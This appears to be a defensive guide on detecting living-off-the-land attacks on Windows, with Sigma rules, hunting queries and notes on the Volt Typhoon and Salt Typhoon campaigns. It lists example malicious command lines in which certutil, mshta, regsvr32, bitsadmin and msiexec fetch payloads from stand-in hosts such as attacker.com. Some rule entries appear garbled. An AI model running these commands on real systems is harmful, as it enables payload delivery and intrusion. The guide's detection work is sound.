Detecting Living Off the Land Attacks: LOLBAS Defense for Enterprise Security Teams

Living off the land binaries are trusted by the operating system by design. Windows needs PowerShell, certutil, mshta, and wmic to function. Blocking them outright breaks legitimate administration. This creates a fundamental tension: the tools that enable system management are the same tools attackers abuse.

Why signatures fail:

• The binary (powershell.exe, certutil.exe) is legitimate — its hash matches the expected Microsoft-signed binary
• No malware file is introduced to disk — the malicious code is passed as command-line arguments or retrieved from memory
• Traditional AV scans files; LOLBAS attacks execute commands that exist only as transient process state

Why many EDR rules miss them:

• EDR detection rules are often built around known-bad indicators (hashes, domains, file paths)
• LOLBAS attacks use trusted binaries accessing legitimate network resources (GitHub, Pastebin, cloud storage) to retrieve payloads
• Alert fatigue: PowerShell, certutil, and WMI generate enormous volumes of legitimate events — defenders tune out or threshold-suppress noisy rules

Why behavioral detection is the answer: Detection requires asking: is this binary behaving as expected for this system, this user, and this time? A certutil.exe process downloading a file from an external URL is anomalous on a database server. PowerShell executing a Base64-encoded command from a Word document child process is anomalous anywhere. This context requires process ancestry, command-line logging, and behavioral baselines that signature scanning cannot provide.

The MITRE ATT&CK mapping: LOLBAS techniques map across multiple ATT&CK tactics: Execution (T1059 — Command and Scripting Interpreter, T1218 — System Binary Proxy Execution), Defense Evasion (T1218, T1202), Persistence (T1053 — Scheduled Tasks, T1546), Lateral Movement (T1021), and Exfiltration (T1048). The breadth of tactics explains why LOLBAS is embedded in almost every sophisticated intrusion.

The LOLBAS project documents 1,000+ binaries, scripts, and libraries that can be abused. In practice, a small subset accounts for the majority of real-world attacks. Focus detection effort here first.

PowerShell (powershell.exe / pwsh.exe) The most abused LOLBAS. Key malicious patterns:

• Base64-encoded commands: -EncodedCommand or -enc flag
• Download cradles: IEX (New-Object Net.WebClient).DownloadString('http://...')
• Bypassing execution policy: -ExecutionPolicy Bypass or -ep bypass
• AMSI bypass attempts: patching amsi.dll in memory
• Encoded/obfuscated scripts: Invoke-Obfuscation, character substitution

Certutil.exe Legitimate use: manage certificates. Malicious use: download arbitrary files, decode Base64.

• Download: certutil.exe -urlcache -split -f http://malicious.com/payload.exe
• Decode: certutil.exe -decode encoded.b64 output.exe

Mshta.exe Executes HTA (HTML Application) files, which can contain JavaScript and VBScript. Malicious use: execute remote scripts.

• mshta.exe http://attacker.com/payload.hta
• mshta.exe vbscript:Execute("CreateObject(...)")

Regsvr32.exe (Squiblydoo) Legitimate use: register/unregister COM DLLs. Malicious use: execute remote scriptlets, bypassing application allowlisting.

• regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

Rundll32.exe Legitimate use: execute DLL functions. Malicious use: execute malicious DLLs, proxy execution to bypass controls.

• rundll32.exe javascript:"..\mshtml,RunHTMLApplication "

WMI (wmic.exe / WMIprvse.exe) Legitimate use: system management. Malicious use: lateral movement, remote execution, persistence, data collection.

• Remote process execution: wmic /node:REMOTE process call create "cmd.exe /c ..."
• Subscription persistence via WMI event subscriptions

Bitsadmin.exe / Background Intelligent Transfer Service Legitimate use: Windows update file transfers. Malicious use: download payloads, establish persistence.

• bitsadmin /transfer job http://attacker.com/payload.exe C:\payload.exe

Msiexec.exe Legitimate use: install MSI packages. Malicious use: install malicious packages from remote URLs.

• msiexec /q /i http://attacker.com/payload.msi

Wscript.exe / Cscript.exe Legitimate use: execute Windows scripts. Malicious use: execute malicious VBScript or JScript.

Behavioral detection for LOLBAS requires correlating process creation events (Event ID 4688 with command-line logging enabled, or Sysmon Event ID 1) with process ancestry and command-line content.

Enable command-line logging (prerequisite): Without command-line argument logging, LOLBAS detection is severely limited. Enable via Group Policy: Computer Configuration > Administrative Templates > System > Audit Process Creation > Include command line in process creation events. Or deploy Sysmon with a configuration that captures process creation events (Event ID 1).

Sigma rule: PowerShell download cradle detection

title: PowerShell Download Cradle
id: 3b6ab547-8ec2-4991-b9d2-2b06702a753e
status: stable
description: Detects PowerShell download cradle patterns used to download and execute remote payloads
author: Detection Engineering Team
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: 'powershell.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'DownloadFile'
      - 'WebClient'
      - 'Invoke-WebRequest'
      - 'iwr '
      - 'curl '
  filter_legitimate:
    CommandLine|contains:
      - 'windowsupdate.com'
      - 'microsoft.com'
  condition: selection and not filter_legitimate
falsepositives:
  - Legitimate PowerShell-based deployment scripts
  - Software update mechanisms
level: high
tags:
  - attack.execution
  - attack.t1059.001

Sigma rule: certutil downloading from internet

title: Certutil Download from Internet
id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b
status: stable
description: Detects certutil.exe used to download files from the internet
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: 'certutil.exe'
    CommandLine|contains:
      - 'urlcache'
      - 'verifyctl'
      - 'encode'
      - 'decode'
  selection_url:
    CommandLine|contains:
      - 'http://'
      - 'https://'
      - 'ftp://'
  condition: selection and selection_url
falsepositives:
  - Legitimate certificate management operations (rare with these flags combined)
level: high
tags:
  - attack.defense_evasion
  - attack.t1218.013

Sigma rule: mshta executing remote URL

title: Mshta Executing Remote Payload
status: stable
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: 'mshta.exe'
    CommandLine|contains:
      - 'http://'
      - 'https://'
      - 'vbscript:'
      - 'javascript:'
  condition: selection
falsepositives:
  - Rare legitimate HTA-based administration tools
level: high

Command-line content alone generates too many false positives for LOLBAS detection. The most powerful detection layer is process ancestry — who spawned this process?

High-confidence anomalous parent-child relationships:

Sigma rule: Office application spawning shell

title: Microsoft Office Application Spawning Shell or Script Host
status: stable
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - 'winword.exe'
      - 'excel.exe'
      - 'powerpnt.exe'
      - 'outlook.exe'
      - 'onenote.exe'
  selection_child:
    Image|endswith:
      - 'cmd.exe'
      - 'powershell.exe'
      - 'wscript.exe'
      - 'cscript.exe'
      - 'mshta.exe'
      - '
egsvr32.exe'
      - '
undll32.exe'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate Office macros that call external processes (audit and allowlist)
level: critical
tags:
  - attack.execution
  - attack.t1566.001

Building parent-child baselines: To reduce false positives, baseline which parent-child process relationships are normal in your environment before deploying detection rules. Run the query in audit mode for two weeks, collect legitimate combinations, add them to the filter block, then enable alerting. This investment dramatically reduces alert fatigue on these high-sensitivity rules.

The CISA advisories on Volt Typhoon and Salt Typhoon provide the clearest real-world picture of how state-sponsored actors use LOLBAS to maintain long-term access.

Volt Typhoon (PRC-sponsored, critical infrastructure): The February 2024 CISA/NSA/FBI advisory describes Volt Typhoon maintaining access to US critical infrastructure for five or more years using exclusively living off the land techniques: no custom malware, no external C2 frameworks, no detectable tooling. Techniques documented:

• Lateral movement via built-in network tools: net, netstat, ipconfig, ping, tracert for reconnaissance without external tooling
• Credential harvesting via NTDS.dit: dumping Active Directory credentials using ntdsutil and Volume Shadow Copy Service — both built-in Windows tools
• Proxy via built-in VPN and remote access features: using legitimate remote access configurations rather than installing RATs
• Log clearing: using wevtutil to clear event logs and cover tracks

Salt Typhoon (PRC-sponsored, telecommunications): The Salt Typhoon campaign compromised telecommunications providers including AT&T, Verizon, and T-Mobile using network device compromise combined with LOLBAS on Windows endpoints. Key LOLBAS usage:

• Living off the land on Cisco IOS and Juniper JunOS — using legitimate network management commands to exfiltrate configuration data and intercept traffic
• Windows credential theft via LSASS memory access without loading Mimikatz — using built-in debugging interfaces and legitimate process access

Detection implications from these campaigns: Both campaigns demonstrate that perimeter-focused detection and signature-based tools provide zero detection value against advanced LOLBAS actors. The detection wins came from behavioral anomaly detection: ntdsutil running on a workstation (not a domain controller) is anomalous; wevtutil clearing logs outside a defined maintenance window is anomalous; outbound connections from legitimate system management binaries to external IPs are anomalous. These detections require behavioral baselines and process telemetry — not signatures.

Reactive detection from Sigma rules catches known patterns. Proactive threat hunting finds novel LOLBAS abuse before it is documented.

Hunt hypothesis framework: Structure hunts around hypotheses based on attacker objectives. For each ATT&CK technique relevant to your environment, ask: if an attacker were using a LOLBin to achieve this technique, what would it look like in our telemetry?

Hunt 1: Unusual outbound connections from system binaries System binaries (certutil, msiexec, mshta, regsvr32) should rarely initiate outbound internet connections. Query your EDR or network logs:

// Kusto (Microsoft Sentinel / Defender)
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("certutil.exe", "mshta.exe", "regsvr32.exe", "msiexec.exe", "bitsadmin.exe")
| where RemoteIPType == "Public"
| where TimeGenerated > ago(30d)
| summarize count() by InitiatingProcessFileName, RemoteIP, RemoteUrl
| order by count_ desc

Hunt 2: Encoded PowerShell commands Any Base64-encoded PowerShell command should be decoded and reviewed:

# PowerShell: decode suspicious encoded commands from logs
$encoded = "JABj..."  # from command line logs
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))

Hunt 3: WMI event subscriptions (persistence) Persistent WMI event subscriptions survive reboots and are invisible to most endpoint tools:

# Query all WMI event subscriptions — any unknown ones are suspicious
Get-WMIObject -Namespace rootsubscription -Class __EventFilter
Get-WMIObject -Namespace rootsubscription -Class __EventConsumer
Get-WMIObject -Namespace rootsubscription -Class __FilterToConsumerBinding

Hunt 4: Scheduled tasks created by unexpected processes New scheduled tasks created by user processes (not SYSTEM or legitimate admin tools) are a persistence signal:

-- Sigma equivalent in Splunk
index=wineventlog EventCode=4698
| where SubjectUserName != "SYSTEM"
| table _time, SubjectUserName, TaskName, TaskContent

Tooling for LOLBAS hunting:

• Velociraptor: Hunt across fleet for LOLBAS IOCs and suspicious process ancestry at scale
• KAPE: Collect prefetch files and Amcache for post-incident reconstruction of LOLBAS execution
• LOLBAS Project (lolbas-project.github.io): Reference for all documented binaries with known malicious uses
• Atomic Red Team: Test your detection coverage by safely simulating LOLBAS techniques against your detection stack